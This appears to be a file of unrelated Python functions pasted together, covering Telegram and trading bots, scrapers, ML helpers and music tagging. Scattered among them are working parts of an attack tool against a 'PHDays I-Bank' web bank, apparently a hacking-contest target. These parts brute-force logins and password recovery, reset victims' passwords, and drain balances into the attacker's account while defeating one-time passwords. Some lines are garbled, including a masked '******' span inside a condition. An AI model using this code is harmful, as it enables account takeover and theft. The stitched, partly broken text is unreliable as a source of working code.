def start(update, context): if is_public_chat(update, context): remove_command(context, update) bot_hello = context.bot.send_message( chat_id=update.effective_message.chat.id, text=messages.msg_start, parse_mode=ParseMode.HTML) cleaner(context, bot_hello) else: username = update.message.from_user.first_name chat_id = update.effective_message.chat.id try: LOGGER.info(f'Subscription token message {update.message.text}') telegram_unique_token = update.message.text.split('/start ')[1] params = { 'telegram_unique_token': telegram_unique_token, 'chat_id': chat_id } x = requests.post(EXCHANGE_URL, data=params) LOGGER.info(f'Subscription response {x.status_code} {x.text}') if x.status_code == 200: message = messages.msg_subscribe.format(username, chat_id) context.bot.send_message(chat_id, message, parse_mode=ParseMode.HTML) else: message = messages.msg_subscribe_error context.bot.send_message(chat_id, message, parse_mode=ParseMode.HTML) except Exception as e: message = messages.msg_default_start.format(username) context.bot.send_message(chat_id, message, parse_mode=ParseMode.HTML) LOGGER.warning(f'<start> Exception Occured: {str(e)}')
def remove_switch(mode: str) -> None: """Remove switch_mode cron jobs. Args: mode (str): either 'on' or 'off' Raises: ValueError: mode is not 'on' or 'off' """ if mode not in ['on', 'off']: message = f'Invalid mode: {mode}' LOGGER.error(message) raise ValueError(message) trigger = 'sunset' if mode == 'on' else 'shutdown' mode = f'switch_{mode}' if not CONF[trigger]['remove']: message = f'{mode} jobs will not be removed.' else: jobs = CRONTAB.remove_script_jobs(f'{mode}') message = f"Jobs ({mode}) removed: {jobs}" LOGGER.info(message)
def dimensionReductionWithPCA(data: np.ndarray, n_components=None) -> np.ndarray: LOGGER.info("Dimensionality reduction with PCA") if type(data) != numpy.ndarray: LOGGER.warn(f'PCA data type is {type(data)}') if isinstance(n_components, float): LOGGER.warn("data is sparse matrix, use integer n_components") raise Exception("data is sparse matrix, please confirm n_components use integer") from sklearn.decomposition import TruncatedSVD pca = TruncatedSVD(n_components) return pca.fit_transform(data) def _su(a: list, cp: float): p = 0 for i in range(len(a)): p += a[i] if p > cp: return i return len(a) assert data.ndim == 2 import math if n_components is None: n_components = math.ceil(data.shape[1] / 2) assert isinstance(n_components, int) or isinstance(n_components, float) if isinstance(n_components, int): if n_components > min(data.shape): n_components = min(data.shape) warnings.warn(f"n_components exceed max size,revise to ${n_components}") pca = PCA(n_components) return pca.fit_transform(data) else: assert 0 < n_components < 1 pca = PCA() result = pca.fit_transform(data) components = _su(pca.explained_variance_ratio_, n_components) LOGGER.info(f'Dimensionality reduction components is {components}') return result[:, 0:components + 1]
def feature_decomposition(transformer, train_features, test_features): LOGGER.info("Beginning Dimensionality reduction using truncated SVD (%d features)" % transformer.n_components) train_dfeatures = transformer.fit_transform(train_features) #LOGGER.debug(["%6f " % transformer.explained_variance_ratio_[i] for i in range(5)]) LOGGER.debug("%0.4f%% of total variance in %d features\n" % ( 100 * transformer.explained_variance_ratio_.sum(), transformer.n_components)) return train_dfeatures, transformer.transform(test_features)
def main(): # get zip codes zip_codes = [row.zip_code for row in session.query(ZipCode).all()] # # add leading 0's to zip codes due to excel's stupidness # zip_codes_df['zip_code'] = zip_codes_df['zip_code'].astype(str) # zip_codes_df['zip_code'] = zip_codes_df['zip_code'].apply(lambda x: '0' * (5 - len(x)) + x) current_month = datetime.date.today().month current_rows = session.query(Indeed).filter( extract('month', Indeed.date_created) == current_month).all() current_rows = [row.as_dict() for row in current_rows] existing_zip_codes = [row['zip_code'] for row in current_rows] remaining_zip_codes = [ zip_code for zip_code in zip_codes if zip_code not in existing_zip_codes ] LOGGER.info( 'Found {} rows for current month: {}. Extracting {} remaining zip codes' .format(len(current_rows), current_month, len(remaining_zip_codes))) for i, zip_code in enumerate(remaining_zip_codes): job_count = get_num_job_postings(zip_code) row = Indeed(zip_code=zip_code, job_count=job_count, date_created=datetime.date.today()) session.merge(row) session.commit() LOGGER.info("Extracting zip code {} ({} of {})".format( zip_code, i, len(remaining_zip_codes))) session.close()
def main(): # get zip codes zip_codes = [row.zip_code for row in session.query(ZipCode).all()] # # add leading 0's to zip codes due to excel's stupidness # zip_codes_df['zip_code'] = zip_codes_df['zip_code'].astype(str) # zip_codes_df['zip_code'] = zip_codes_df['zip_code'].apply(lambda x: '0' * (5 - len(x)) + x) current_month = datetime.date.today().month current_rows = session.query(Indeed).filter(extract('month', Indeed.date_created) == current_month).all() current_rows = [row.as_dict() for row in current_rows] existing_zip_codes = [row['zip_code'] for row in current_rows] remaining_zip_codes = [zip_code for zip_code in zip_codes if zip_code not in existing_zip_codes] LOGGER.info('Found {} rows for current month: {}. Extracting {} remaining zip codes'.format(len(current_rows), current_month, len( remaining_zip_codes))) for i, zip_code in enumerate(remaining_zip_codes): job_count = get_num_job_postings(zip_code) row = Indeed(zip_code=zip_code, job_count=job_count, date_created=datetime.date.today()) session.merge(row) session.commit() LOGGER.info("Extracting zip code {} ({} of {})".format(zip_code, i, len(remaining_zip_codes))) session.close()
def check_order_made_status(self): while True: order = self.client.get_order(symbol=self.symbol, orderId=self.order_made_id) status = order['status'] LOGGER.info(f'CURRENT ORDER STATUS: {status}') if self.order_made_time + timedelta(minutes=5) < datetime.now(): if status == 'PARTIALLY_FILLED': if self.order_made_time + timedelta( minutes=20) < datetime.now(): self.order_made_status = status self.order_executed = order if order['side'] == 'BUY': self.bot_status = 'BOUGHT' if order['side'] == 'SELL': self.bot_status = 'SOLD' return if status == 'NEW': self.client.cancel_order(symbol=self.symbol, orderId=self.order_made_id) if status in ['FILLED', 'CANCELED', 'REJECTED', 'EXPIRED']: self.order_made_status = status self.order_executed = order if status == 'FILLED': if order['side'] == 'BUY': self.bot_status = 'BOUGHT' if order['side'] == 'SELL': self.bot_status = 'SOLD' return LOGGER.info('WAITING 30 SECONDS TO CHECK ORDER AGAIN') time.sleet(30)
def paginate_request(resource_uri, page_size, request_callback=None): page = 1 data = [] while True: param_prefix = "&" if "?" in resource_uri else "?" pagination_params = "{}page={}&page_size={}".format( param_prefix, page, page_size) api_uri = "{resource_uri}{pagination_params}".format( resource_uri=resource_uri, pagination_params=pagination_params) response = request(api_uri) response_data = response["data"] if request_callback: request_callback(response_data) data += response_data if not data: break total_count = response["meta"]["page"]["total_count"] page = response["meta"]["page"]["current_page"] records_fetched_count = page_size * page LOGGER.info("paginate_request: {}\t records fetched: {}/{}".format( resource_uri, records_fetched_count, total_count)) if records_fetched_count >= total_count: break page += 1 return data
def get_itunes_track_data(self, track_path, itunes_keys): # TODO: iTunes uses HTML encoding for some things (ampersands) and URL encoding for the rest with open('/Users/carmstrong/Music/iTunes/iTunes Music Library.xml', 'rb') as itunes_xml: tree = etree.parse(itunes_xml) itunes_track_path = 'file://' + urllib.quote(track_path.encode('utf-8'), safe="/(),'") location_node = tree.xpath('//string[text()="{}"]'.format(itunes_track_path)) if not location_node: LOGGER.info('{} not found in iTunes XML file.'.format(itunes_track_path)) return results = {} for itunes_key in itunes_keys: try: itunes_value = location_node[0].xpath("../key[text()='{}']".format(itunes_key))[0].getnext().text try: itunes_value = int(itunes_value) except (ValueError, TypeError): continue results.update({itunes_key: itunes_value}) except IndexError: continue return results
def handleTraceback(object): context = object.context entry_url = object.entry_url if entry_url is None: return LOGGER.info("handle traceback [%s]" % entry_url) try: cleanup_lock.acquire() # we don't want to produce any errors here, thus, we'll be nice and die # silently if an error occurs here try: transaction.begin() # get our logbook view to use the api logbook = context.unrestrictedTraverse('@@logbook') # get the generated error url from Products.SiteErrorLog err_id = urllib.splitvalue(entry_url)[1] # save error logbook.save_error(err_id, context=aq_parent(context)) transaction.get().note('collective.logbook traceback [%s]' % entry_url) transaction.commit() finally: cleanup_lock.release() # only warning except Exception, e: LOGGER.warning("An error occured while handling the traceback") LOGGER.warning("%s" % e) LOGGER.exception(e)
def check_profit_status_bought_position(self): LOGGER.info('CHECKING PROFIT STATUS FOR BOUGHT POSITION') self.profit_check_value = round( self.actual_price * self.quoteqty, 6) - round(( (self.actual_price * self.quoteqty) * self.max_trade_taxes), 6) position_bought_winnin = round( self.order_executed_quantity + self.stop_pair, 6) position_bought_losing = round( self.order_executed_quantity - self.stop_pair, 6) LOGGER.info(f'PROFIT CHECK VALUE: {self.profit_check_value}') LOGGER.info(f'VALUES OF STOP TO CHECK OF:') LOGGER.info(f'POSITION BOUGHT/WINNING: {position_bought_winnin}') LOGGER.info(f'POSITION BOUGHT/LOSING: {position_bought_losing}') if self.profit_check_value > position_bought_winnin: self.profit_status = 'WINNING' elif self.profit_check_value < position_bought_losing: self.profit_status = 'LOSING' else: self.profit_status = 'STANDING'
def call(): period = 10 while True: try: response = requests.get(url=URL_CHECK_CONNECTION, params=params) if response.status_code == 200: LOGGER.info( 'Send check connection request to Smartsite successful!') active = json.loads(response.content)['result'] if active: LOGGER.info('Gateway is online!') else: LOGGER.info('Gateway is offline!') subprocess.Popen(COMMAND_RESET_SERVICE_7688, shell=True, stdout=subprocess.PIPE) else: LOGGER.info('Response from Smartsite is not 200') subprocess.Popen(COMMAND_RESET_SERVICE_7688, shell=True, stdout=subprocess.PIPE) except Exception as ex: LOGGER.info('Error when check connection with message: %s', ex.message) subprocess.Popen(COMMAND_RESET_SERVICE_7688, shell=True, stdout=subprocess.PIPE) time.sleep(period)
def execute_search(self, url, pause=2): """ Executes a search to Twitter for the given URL :param url: URL to search twitter with :return: A JSON object with data from Twitter """ headers = {'user-agent': self.get_random_user_agent()} try: requests.packages.urllib3.disable_warnings( requests.packages.urllib3.exceptions.InsecureRequestWarning) r = requests.get(url=url, proxies=self.proxies, headers=headers, allow_redirects=False, verify=False, timeout=30) LOGGER.info(url) time.sleep(pause) content = r.text dejson = json.loads(content) return dejson # If we get a ValueError exception due to a request timing out, we sleep for our error delay, then make # another attempt except ValueError as e: # print e.message # print "Sleeping for %i" % self.error_delay sleep(self.error_delay) return self.execute_search(url)
def acoustid_lookup(fingerprint, duration): results = acoustid.lookup(ACOUST_ID_API_KEY, fingerprint, duration, meta='recordings + releasegroups') if results.get('results') and results['results'][0].get('recordings'): LOGGER.info('AcoustID result found!') recordings = results['results'][0]['recordings'] recording = max(recordings, key=lambda x: len(x.keys())) recording_id = recording['id'] recording_artists = recording['artists'] recording_title = recording['title'] album_artist = recording_artists[0]['name'] artist = ''.join([ artist['name'] + artist.get('joinphrase', '') for artist in recording_artists ]) album = recording['releasegroups'][0][ 'title'] # TODO: the results of this are often inconsistent return { 'musicbrainz_releasetrackid': recording_id, 'title': recording_title, 'artist': artist, 'albumartist': album_artist, 'album': album } else: LOGGER.info('No AcoustID results found.') return {}
def do_synchronize_generate(mirrors): yield "Starting synchronize...\n" for mirror in mirrors: yield "Synchronizing '{}'\n".format(mirror.text_val) try: resp = requests.get(mirror.text_val) if resp.status_code != 200: yield "Errornous http status code: {}. Skipping this mirror.\n".format( resp.status_code) continue packages_mirror = json.loads(resp.content) packages = db_session.query(Package).options( load_only(Package.owner, Package.repo, Package.path, Package.ptype)).all() packages_added = 0 for package_mirror in packages_mirror: found = False if "path" not in package_mirror: package_mirror["path"] = None for package in packages: if package_mirror["owner"] == package.owner \ and package_mirror["ptype"] == package.ptype \ and package_mirror["repo"] == package.repo \ and package_mirror["path"] == package.path: found = True break if not found: LOGGER.info("Synchronize: adding %s", package_mirror) insert_package(package_mirror["owner"], package_mirror["repo"], package_mirror["ptype"], package_mirror["path"], dateutil.parser.parse( package_mirror["added"]), commit=False) yield "adding {}\n".format(package_mirror) packages_added += 1 if packages_added > 0: try: db_session.commit() except Exception as ex: db_session.rollback() LOGGER.error(ex) LOGGER.debug("{}: {}\n".format(ex, traceback.format_exc())) yield "{}\n".format(ex) else: db_session.rollback() yield "Mirror '{}': {} packages added.\n".format( mirror.text_val, packages_added) except Exception as ex: LOGGER.error(ex) error = "{}: {}\n".format(ex, traceback.format_exc()) LOGGER.debug(error) yield error yield "Synchronization done.\n"
def remove_command(context, update): # Delete Bot Commands from Group Members msg = update.effective_message try: msg.delete() LOGGER.info(f'CMD Message Deleted - {msg.message_id}') except BaseException as e: LOGGER.info(f'CMD Message Already Deleted - {str(e)}')
def check_profit_status(self): if self.bot_status == 'BOUGHT': self.check_profit_status_bought_position() if self.bot_status == 'SOLD': self.check_profit_status_sold_position() LOGGER.info(f'PROFIT STATUS: {self.profit_status}')
def handle(fd, address): global data_queue global uid_queue global target_uid_queue db = getDB() LOGGER.info('connection accepted from %s:%s' % address) while True: data = fd.readline() if not data: break data = data[:-2] r = json.loads(data, object_hook=_obj_hook) if hasattr(r, 'action'): action = r.action else: break if action == 'postdata': try: data_queue.put(r.data) fd.write(json.dumps({'status': 'ok'})+'\r\n') except: fd.write(json.dumps({'error': 'bad request data'})+'\r\n') fd.flush() elif action == 'getuid': if not uid_queue.empty(): uid = uid_queue.get() pages = 0 user = db.users.find_one({'_id': uid}) try: pages = user['pages'] except: pages = 0 fd.write(json.dumps({'uid': uid, 'pages': pages})+'\r\n') else: fd.write(json.dumps({'error': 'uid queue empty'})+'\r\n') fd.flush() elif action == 'getuserinfo': try: name = r.data user = db.users.find_one({'name': name}) try: u = {'_id': user['_id'], 'gender': user['gender'], 'location': user['location']} fd.write(json.dumps({'user': u})+'\r\n') except: fd.write(json.dumps({'error': 'not found'})+'\r\n') except: fd.write(json.dumps({'error': 'bad request data'})+'\r\n') fd.flush() elif action == 'gettargetuid': uid = target_uid_queue.get() if uid: fd.write(json.dumps({'uid': uid})+'\r\n') else: fd.write(json.dumps({'error': 'target uid queue empty'})+'\r\n') fd.flush() else: break LOGGER.info('end connection %s:%s' % address)
def classify(classifier, train_features, train_labels, test_features, test_labels, desc="Linear classifer"): LOGGER.info("Beginning %s" % desc) classifier.fit(train_features, train_labels) results = classifier.predict(test_features) correct = get_correct_num(results, test_labels) LOGGER.info("%s predicted %d/%d correctly (%0.3f%% accuracy)\n" % ( desc, correct, len(test_labels), correct / len(test_labels) * 100)) return results
def save(self): self.sync() if self.easyID3.is_modified: LOGGER.info('Saving file changes...') self.easyID3.save() if session.is_modified(self.model): LOGGER.info('Committing model changes...') session.merge(self.model) session.commit()
def rescale_features(train, test): LOGGER.info("Rescaling feature matrices") if issparse(train): LOGGER.info("Converting feature matrices from sparse to dense") train = csr_matrix(train).todense() test = csr_matrix(test).todense() scaler = StandardScaler(with_mean=False) train_features_rs = scaler.fit_transform(train) return train_features_rs, scaler.transform(test)
def acquire_track_model(self): # determine if fingerprint present, if not generate if not self.fingerprint: self.query_fingerprint() # use fingerprint to query model self.model = session.query(SavedTrack).get(self.fingerprint) # if 0 results, create model if not self.model: LOGGER.info('Track not found in database; creating...') self.model = SavedTrack()
def add_good(user, password, data, opener): LOGGER.info('!!Found good: %r %r', user, password) with kLock: known_users.add(user) try: acc_data = account_data(user, password, data, opener) GOOD.put(acc_data) except ValueError: LOGGER.error('Error adding %r %r', user, password) LOGGER.debug('%s', data)
def iteration_request(id, uri_templete, ignore_404, request_callback): resource_uri = uri_templete.format(id) response = request(resource_uri, ignore_404=ignore_404) if response and response['data']: if request_callback: request_callback(response['data']) LOGGER.info("{} - done".format(resource_uri)) return response['data'] LOGGER.info("{} - response empty".format(resource_uri)) return {}
def decompose_tsvd_target(transformer, train_features, test_features, target_cuml_var_ratio=0.9): LOGGER.info("Aiming for %.3f%% cumulative total sum of variance" % (target_cuml_var_ratio * 100)) #transformer = TruncatedSVD(n_components=n_features) train_d, test_d = feature_decomposition(transformer, train_features, test_features) if sum(transformer.explained_variance_ratio_) < target_cuml_var_ratio: return decompose_tsvd_target( TruncatedSVD(n_components=(transformer.n_components*2)), train_features, test_features, target_cuml_var_ratio) LOGGER.debug("Reduced feature vectors size: %d" % csr_matrix(train_features[-1]).toarray().size) return transformer, train_d, test_d
def cleaner(context, message): time.sleep(PATIENCE) try: context.bot.deleteMessage( chat_id=message.chat_id, message_id=message.message_id ) LOGGER.info(f'Message Deleted - #{message.message_id}') except BaseException as e: LOGGER.info(f'Message Already Deleted - {str(e)}') pass
def check_mentions(api) -> None: """Checks for new mentions and favorite this mentions.""" # Retrieve the last 20 mentions. mentions = api.mentions_timeline() for tweet in mentions: if not tweet.favorited: try: tweet.favorite() LOGGER.info(f'Tweet from {tweet.user.name} favorited!') except Exception: LOGGER.error('Error on fav', exc_info=True)
def persist_zillow_metrics(df): metrics_df = df.drop(['city', 'metro', 'state', 'county'], axis=1) session.query(ZillowMetrics).delete() # TODO: should append to existing data in case zillow changes something session.commit() insert_chunk = 100000 index_start = 0 while index_start < len(metrics_df): LOGGER.info('Persisting Zillow Metrics rows: {} of {}'.format(index_start + insert_chunk, len(metrics_df))) engine.execute( ZillowMetrics.__table__.insert(metrics_df[index_start:index_start + insert_chunk].to_dict('records'))) index_start += insert_chunk
def main(): LOGGER.info('Extracting building permit data...') post_data_list = generate_post_data((1, 12), (2005, 2015)) pool = ThreadPool(5) results = pool.map(get_census_reponse, post_data_list) results_array = parse_results(results) for result in results_array: session.merge(BuildingPermit(**result)) session.commit()
def _get_collection(self, collection_name: str): """Access particular database collection Note: if collection does not exist it will be automatically created """ try: db_collection = self.cursor[collection_name] LOGGER.info(f'created to {collection_name} collection') return db_collection except Exception as e: raise e
def do_change(self, obj): LOGGER.info('Changing password for: %s', obj.user) req = urllib2.Request('http://{0}/change_password.php'.format(TARGET_HOST), urllib.urlencode({ 'password': obj.password, 'newpassword': sha1('{0}|hekked'.format(obj.user)).hexdigest(), 'newpassword2': sha1('{0}|hekked'.format(obj.user)).hexdigest(), }) ) data = my_url_open(obj.opener, req) if 'error' not in data: LOGGER.critical('Password changed for user: %s', obj.user) return True
def _get_cursor(): """Access database Note: if database does not exist it will be automatically created """ try: client = MongoClient(DB_URL) db_cursor = client[DB_NAME] LOGGER.info(f'accessed to {DB_NAME} database') return db_cursor except Exception as e: raise e
def run(self): LOGGER.info('Start stealer') while 1: try: obj = GOOD.get(timeout=2) except Exception as e: LOGGER.error('Unknown error in Stealer') continue if FORCE_STEAL: self.do_otp(obj) CHANGE.put(obj) GOOD.task_done()
def trainELMWithBvsb(self): i = 0 print("---------------------ELM-BVSB-TRAIN-----------------------------") while self._iter_continue: i = i + 1 print(f'--------------------第{i}次训练--------------------') self.elmc.fit(self.X_train, self.Y_train) preData = self.elmc.predict_with_percentage(self.X_iter) score = self.elmc.scoreWithPredict(self.Y_iter, preData) LOGGER.info(f'第{i}次迭代后迭代数据集的正确率为{score}') LOGGER.debug(f'perData 类型为:{type(preData)}') self.updateTrainDataWithBvsb(preData) LOGGER.debug(f'第{i}次迭代训练后测试集的分类正确率为{self.score(self.X_test, self.Y_test)}')
def get_target_by_command_ats(command): target = -1 try: if 'MainAts' in command or 'AutoAts' in command or 'GenAts' in command or 'Ats' in command: target = 0 else: LOGGER.error('Command is not a string: %s', str(command)) except Exception as ex: LOGGER.error( 'Error at get_target_by_command_ats function with message: %s', ex.message) LOGGER.info('Command is: %s, after parse is: %d', command, target) return target
def argBvsbWithAccuracy(self, perData: np.ndarray): argAcc = BvsbUtils.getAccIndex(self.Y_iter, perData) LOGGER.info(f'KNN与ELM匹配个数{argAcc.size}') if argAcc.size == 0: return np.array([], dtype=int) assert argAcc.max() < perData.shape[0] bvsbData = BvsbUtils.calculateBvsb(perData) arrBvsb = np.c_[bvsbData[argAcc], argAcc] argSBvsbAcc = arrBvsb[arrBvsb[:, 0].argsort()][:, 1] _iterNum = int(min(self.perNum, self._upperLimit)) LOGGER.debug(f'欲获取的bvsb-knn数据个数:{_iterNum}') LOGGER.debug(f'bvsb-knn 一致后数据个数: {len(argSBvsbAcc)}') return argSBvsbAcc[-_iterNum:].astype(int)
def run(self): LOGGER.info('Run brute') while 1: try: user, password = ENEMY.get(block=1, timeout=10) except Queue.Empty: continue if user in known_users: continue self.generate_opener() data = self.brute_login_with_session(user, password) account_password_queue.task_done() if self.check(data): add_good(user, password, data, self.opener)
def search_echonest_artist_terms(artist_name): artist_results = artist.search(name=artist_name) if not artist_results: LOGGER.info('Artist not found in Echonest') return None if artist_results[0].name.lower() == artist_name.lower(): artist_terms = artist_results[0].terms if artist_terms: return max(artist_terms, key=lambda x: x['weight'] * x['frequency'])['name'] else: return None else: LOGGER.info("Artist name did not match top result: {} vs {}".format(artist_name, artist_results[0].name)) return None
def facebook_convert_to_id(fb_url): # https://www.facebook.com/profile.php?id=1000 url_parse = urlparse(fb_url) if "facebook.com" in url_parse.netloc: if "/profile.php" in url_parse.path: preg = "id=(\d{1,})" m = re.findall(preg, url_parse.query) if len(m): LOGGER.info( 'successfully converted facebook id for url : [%s to %s]' % (fb_url, m[0])) return m[0] # https://facebook.com/zuck headers = get_headers() csrfmiddlewaretoken = get_csrfmiddlewaretoken(headers) if csrfmiddlewaretoken: data = { "csrfmiddlewaretoken": csrfmiddlewaretoken, "fburl": fb_url } headers.update({ "Cookie": "csrftoken={csrfmiddlewaretoken}".format( csrfmiddlewaretoken=csrfmiddlewaretoken) }) try: r = requests.post('http://findmyfbid.in/', data=data, timeout=10, allow_redirects=False, proxies=PROXIES, headers=headers) location = r.headers['Location'] preg = r'\d{1,}' m = re.findall(preg, location) if len(m): LOGGER.info( 'successfully converted facebook id for url : [%s to %s]' % (fb_url, m[0])) return m[0] else: return None except Exception as e: LOGGER.exception(e) return None else: return None else: return None
def __init__(self, user, password, data, opener): LOGGER.info('Created new account data for %s', user) self.user = user self.password = password self.number = RE_ACCOUNT_NUMBER.search(data) self.amount = RE_AMOUNT.search(data) self.id = RE_ID.search(data) if self.number is None or self.amount is None: raise ValueError('No account number or amount in file') self.number = self.number.group(1) self.amount = self.amount.group(1) self.amount = int(float(self.amount)) self.id = self.id.group(1) self.opener = opener
def run(self): LOGGER.info('Start changer') while 1: try: obj = CHANGE.get(timeout=2) except Exception as e: LOGGER.error('Unknown error in Changer!') continue cookiejar = cookielib.CookieJar() self.opener = urllib2.build_opener( urllib2.HTTPCookieProcessor(cookiejar), ) self.do_change(obj) CHANGE.task_done()
def process(self, event): """ event.event_type 'modified' | 'created' | 'moved' | 'deleted' event.is_directory True | False event.src_path path/to/observed/file """ track_path = event.dest_path if event.event_type == 'moved' else event.src_path LOGGER.info('File change detected: {event_type}: {track_path}'.format( event_type=event.event_type, track_path=track_path)) if '/Users/carmstrong/Projects/music_master/tracks/holding' in track_path: LOGGER.info('Protected path, will make no changes!!') sync_file(track_path, event.event_type)
def trainOSELMWithKNNButBvsb(self): i = 0 print("----------------------OSELM WITH KNN BUT BVSB---------------------------") while self._iter_continue: i = i + 1 print(f'---------------第{i}次训练-------------------') predict = self.elmc.predict(self.X_iter) _data = self.getUpdataWithoutBVSB(predict) if _data is None: LOGGER.warn("未获取迭代数据,迭代训练结束") break LOGGER.info(f'第{i}次训练时进行训练的数据个数:{_data[1].size}') print(_data[1].shape) self.elmc.fit(_data[0], _data[1]) LOGGER.debug(f'第{i}次迭代训练后测试集的分类正确率为{self.score(self.X_test, self.Y_test)}')
def process(self, event): """ event.event_type 'modified' | 'created' | 'moved' | 'deleted' event.is_directory True | False event.src_path path/to/observed/file """ track_path = event.dest_path if event.event_type == 'moved' else event.src_path LOGGER.info('File change detected: {event_type}: {track_path}'.format(event_type=event.event_type, track_path=track_path)) if '/Users/carmstrong/Projects/music_master/tracks/holding' in track_path: LOGGER.info('Protected path, will make no changes!!') sync_file(track_path, event.event_type)
def persist_zillow_metrics(df): metrics_df = df.drop(['city', 'metro', 'state', 'county'], axis=1) session.query(ZillowMetrics).delete( ) # TODO: should append to existing data in case zillow changes something session.commit() insert_chunk = 100000 index_start = 0 while index_start < len(metrics_df): LOGGER.info('Persisting Zillow Metrics rows: {} of {}'.format( index_start + insert_chunk, len(metrics_df))) engine.execute( ZillowMetrics.__table__.insert( metrics_df[index_start:index_start + insert_chunk].to_dict('records'))) index_start += insert_chunk
async def fetch(client, url): with async_timeout.timeout(15): try: headers = {'user-agent': get_random_user_agent()} async with client.get(url, headers=headers) as response: assert response.status == 200 LOGGER.info('Task url: {}'.format(response.url)) try: text = await response.text() except: text = await response.read() return text except Exception as e: LOGGER.exception(e) return None
def run(self): while 1: self.generate_opener() data = self.brute_login(MY_LOGIN, MY_PASSWORD) if 'Transactions' in data: LOGGER.info('Account protected') else: LOGGER.critical('Our account hacked!') if self.dup_gold: obj = account_data(MY_LOGIN, MY_PASSWORD, data, self.opener) RaceObject.set_obj(obj) with RaceObject.RaceLock: RaceObject.RaceLock.notify() RaceObject.RaceLock.wait() time.sleep(0.05)
def run(self): LOGGER.info('Run enemy generator') for password in self.passwords_list: #LOGGER.info('Password: %s', password) #ENEMY.put((user, '')) for user in self.users_list: if user in known_users: break LOGGER.debug('%r:%r', user, password) while 1: try: account_password_queue.put((user, password), block=1, timeout=1) break except Queue.Full: LOGGER.error('account_password queue full!') pass
def run(self): LOGGER.info('Run numeric login-password generator') for user in self.users_list: account_password_queue.put((user, sha1('{0}|hekked'.format(user)).hexdigest())) RECOVER.put(str(user)) for password in self.passwords_list: if user in known_users: break LOGGER.debug('Add in queue: %s:%s', user, password) while 1: try: account_password_queue.put((user, password), block=1, timeout=1) break except Queue.Full: LOGGER.error('account_password queue full!') pass
def _pre_otp(self, obj): if int(obj.amount) <= 0: LOGGER.info('No money on account: %s', obj.user) return False req = urllib2.Request('http://{0}/transaction.php'.format(TARGET_HOST), urllib.urlencode({ 'accountNumberFrom': obj.number, 'accountNumberTo': MY_ACCOUNT, 'accountSum': obj.amount, 'step': 'step2' }) ) data = my_url_open(obj.opener, req) # TODO: bad auth?? if 'PHDays I-Bank Pro: transaction' not in data: obj.opener = self.generate_opener() self.do_login(obj.user, obj.password, obj.opener) data = my_url_open(obj.opener, req) return data
def run(): LOGGER.info('Getting music from HypeMachine...') results = hypem.get_popular(filter='lastweek', page=1) LOGGER.info('Found {} tracks, merging to database...'.format( len(results.data))) try: for track in results.data: date_posted = datetime.fromtimestamp(track.data['dateposted']) #TODO: this is unpredictable because there are random postid's returned with different loved and # dateposted values hours_delta = ( datetime.now() - date_posted).total_seconds() / 60 / 60 source_score = int(track.data['loved_count'] / hours_delta) hypem_row = QueuedTrack( title=track.data['title'], artist=track.data['artist'], year=date_posted.year, source='hypemachine', source_score=source_score, duration=track.data['time']) session.merge(hypem_row) except: raise finally: session.commit() LOGGER.info('Merge completed.')
def acoustid_lookup(fingerprint, duration): results = acoustid.lookup(ACOUST_ID_API_KEY, fingerprint, duration, meta='recordings + releasegroups') if results.get('results') and results['results'][0].get('recordings'): LOGGER.info('AcoustID result found!') recordings = results['results'][0]['recordings'] recording = max(recordings, key=lambda x: len(x.keys())) recording_id = recording['id'] recording_artists = recording['artists'] recording_title = recording['title'] album_artist = recording_artists[0]['name'] artist = ''.join([artist['name'] + artist.get('joinphrase', '') for artist in recording_artists]) album = recording['releasegroups'][0]['title'] # TODO: the results of this are often inconsistent return {'musicbrainz_releasetrackid': recording_id, 'title': recording_title, 'artist': artist, 'albumartist': album_artist, 'album': album} else: LOGGER.info('No AcoustID results found.') return {}
def run(self): while 1: self.generate_opener() account = RECOVER.get() LOGGER.info('Trying to recover: %s', account) if account in known_users: continue if not self.pre_test(account): LOGGER.info('Impossible to recover: %s', account) continue for i in xrange(1, 251): data = self.brute_one(account, i) if 'Identifier not found' in data: break if 'repeat' in data: continue result = NEW_PASSWORD.search(data) if result: data = self.do_login(account, result.group(1)) if self.check(data): LOGGER.critical('RECOVERED: %s %s', account, result.group(1)) add_good(account, result.group(1), data, self.opener) break
def do_otp(self, obj): data = self._pre_otp(obj) if data is False: return False step3 = urllib2.Request('http://{0}/transaction.php'.format(TARGET_HOST), urllib.urlencode({ 'step': 'step3' }) ) step4 = urllib2.Request('http://{0}/transaction.php'.format(TARGET_HOST), urllib.urlencode({ 'step': 'step4' }) ) # Case: # 1) No otp if 'Commit transaction.' in data: LOGGER.info('No otp') data = my_url_open(obj.opener, step3) # 2) SmartCard otp elif 'One-time password:'******'Smart card otp') data = my_url_open(obj.opener, step4) # 3) Brute otp elif 'One-time password (#' in data: tmp_ticket = RE_TICKET.search(data) if not tmp_ticket: return False tmp_ticket = tmp_ticket.group(1) step_OTP1 = urllib2.Request('http://{0}/transaction.php'.format(TARGET_HOST), urllib.urlencode({ 'step': 'step3', 'OTP': obj.gen_otp(tmp_ticket, 2) }) ) step_OTP2 = urllib2.Request('http://{0}/transaction.php'.format(TARGET_HOST), urllib.urlencode({ 'step': 'step3', 'OTP': obj.gen_otp(tmp_ticket, 3) }) ) data = my_url_open(obj.opener, step_OTP1) data += my_url_open(obj.opener, step_OTP2) data = my_url_open(obj.opener, step4) else: LOGGER.error('Bad transaction page: ') LOGGER.debug('%r', data) result = 'Transaction committed!' in data if result: LOGGER.info('Transaction from: %s', obj.number) return result
def send(portal, message, subject, recipients=[]): """Send an email. this is taken from Products.eXtremeManagement """ # Weed out any empty strings. recipients = [r for r in recipients if r] if not recipients: LOGGER.warn("No recipients to send the mail to, not sending.") return charset = portal.getProperty('email_charset', 'ISO-8859-1') # Header class is smart enough to try US-ASCII, then the charset we # provide, then fall back to UTF-8. header_charset = charset # We must choose the body charset manually for body_charset in 'US-ASCII', charset, 'UTF-8': try: message = message.encode(body_charset) except UnicodeError: pass else: break # Get the 'From' address. registry = getUtility(IRegistry) sender_name = registry.get('plone.email_from_name') sender_addr = registry.get('plone.email_from_address') # We must always pass Unicode strings to Header, otherwise it will # use RFC 2047 encoding even on plain ASCII strings. sender_name = str(Header(safe_unicode(sender_name), header_charset)) # Make sure email addresses do not contain non-ASCII characters sender_addr = sender_addr.encode('ascii') email_from = formataddr((sender_name, sender_addr)) formatted_recipients = [] for recipient in recipients: # Split real name (which is optional) and email address parts recipient_name, recipient_addr = parseaddr(recipient) recipient_name = str(Header(safe_unicode(recipient_name), header_charset)) recipient_addr = recipient_addr.encode('ascii') formatted = formataddr((recipient_name, recipient_addr)) formatted_recipients.append(formatted) email_to = ', '.join(formatted_recipients) # Make the subject a nice header subject = Header(safe_unicode(subject), header_charset) # 